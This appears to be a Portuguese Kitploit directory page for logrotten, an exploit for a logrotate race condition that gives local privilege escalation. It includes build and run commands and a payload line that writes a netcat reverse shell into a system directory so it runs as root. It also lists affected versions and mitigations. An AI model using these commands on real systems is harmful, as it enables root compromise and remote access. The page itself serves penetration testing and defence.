Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
logrotten — Exploração de condição de corrida no Logrotate que permite escalonamento de privilégios ao gravar arquivos arbitrários, como payloads de reverse shell, em diretórios do sistema. | Kitploit
Ferramentas/GitHubGitHub/whotwagner/logrotten
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de PenetraçãoRed TeamingExploração de Binários
GitHubwhotwagner/logrotten

logrotten

Exploração de condição de corrida no Logrotate que permite escalonamento de privilégios ao gravar arquivos arbitrários, como payloads de reverse shell, em diretórios do sistema.

Ver Repositório
211263há 8 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

[!WARNING]
Este repositório foi movido para https://codeberg.org/whotwagner/logrotten. Por favor, visite o novo local para as atualizações mais recentes.

Vencendo uma condição de corrida no logrotate para elevar privilégios

Logrotten Logo

Descrição breve

  • logrotate é propenso a uma condição de corrida após renomear o arquivo de log.
  • Se o logrotate for executado como root, com opção que cria um arquivo (como create, copy, compress, etc.) e o usuário tiver controle do caminho do arquivo de log, é possível abusar de uma condição de corrida para escrever arquivos em QUAISQUER diretórios.
  • Um atacante poderia elevar seus privilégios escrevendo reverse-shells em diretórios como "/etc/bash_completition.d/".

Pré-condição para elevação de privilégios

  • O Logrotate precisa ser executado como root
  • O caminho de log precisa estar sob o controle do atacante
  • Qualquer opção que crie arquivos deve estar definida na configuração do logrotate

Versões testadas

  • Debian GNU/Linux 11 (bullseye)
  • Debian GNU/Linux 9.5 (stretch)
  • Amazon Linux 2 AMI (HVM)
  • Ubuntu 18.04.1
  • logrotate 3.8.6
  • logrotate 3.11.0
  • logrotate 3.15.0
  • logrotate 3.18.0

Compilar

  • gcc -o logrotten logrotten.c

Preparar payload

root@kitploit:~
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile

Executar o exploit

Se a opção "create" estiver definida no logrotate.cfg:

root@kitploit:~
./logrotten -p ./payloadfile /tmp/log/pwnme.log

Se a opção "compress" estiver definida no logrotate.cfg:

root@kitploit:~
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log

Problemas conhecidos

  • Era difícil vencer a corrida dentro de um container docker ou em um volume lvm2. Esta versão do logrotten melhora a confiabilidade.

Mitigação

  • certifique-se de que o caminho de log pertence a root
  • use a opção "su" no logrotate.cfg
  • use selinux ou apparmor

Autor

  • Wolfgang Hotwagner

Referências

  • https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
  • https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
  • https://github.com/whotwagner/logrotten
  • https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
  • https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd
Baixar ferramenta